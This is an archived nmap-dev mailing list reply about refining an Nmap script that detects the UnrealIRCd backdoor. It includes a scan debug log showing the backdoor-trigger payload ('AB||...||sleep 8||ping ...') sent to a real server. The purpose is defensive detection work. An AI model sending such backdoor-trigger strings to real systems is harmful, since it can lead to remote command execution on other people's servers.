Re: Always practice safe software: a lesson from UnrealIRCd

[David Fifield <david () bamsoftware com>]

On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:
> I found a better way to detect vulnerable servers, but unfortunately
> it isn't something an average person can do (requires a DNS
> authoritative server). 
>
> > From the original list, with a 20 second delay and 40 second timeout,
> on the list you provided earlier, I found:
> o 4 vulnerable servers
> o 3 were discovered
> o 1 false positive
> o 1 was missed because of 'too many reconnects'
>
> So, that isn't very good. We can make the delays even longer, and I
> think it'll get rather accurate, but I don't think that's ideal,
> either. I'm going to give mutex a shot, still. 

Ah, so the timing is accurate enough, but it's not really an accurate
reflection of whether the vulnerability exists. I tried using
irc-unrealircd-backdoor.command to ping a server, and against all the 9-
and 11-second hosts, a vulnerability was detected but I didn't receive
any pings.

It looks like the delay is really being caused by a lack of an auth
response.

Discovered open port 6667/tcp on 91.121.137.140
NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667.
NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16
NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 [91.121.137.140:6667]
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1
NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||ping 
-n 9 127.0.0.1.
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106
NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154
NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your 
hostname; using your IP address instead
NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username 
prefixed with ~
NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274
NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 
AB||SOMETHINGUNIQUE||sleep :You have not registered..
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not 
registered

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/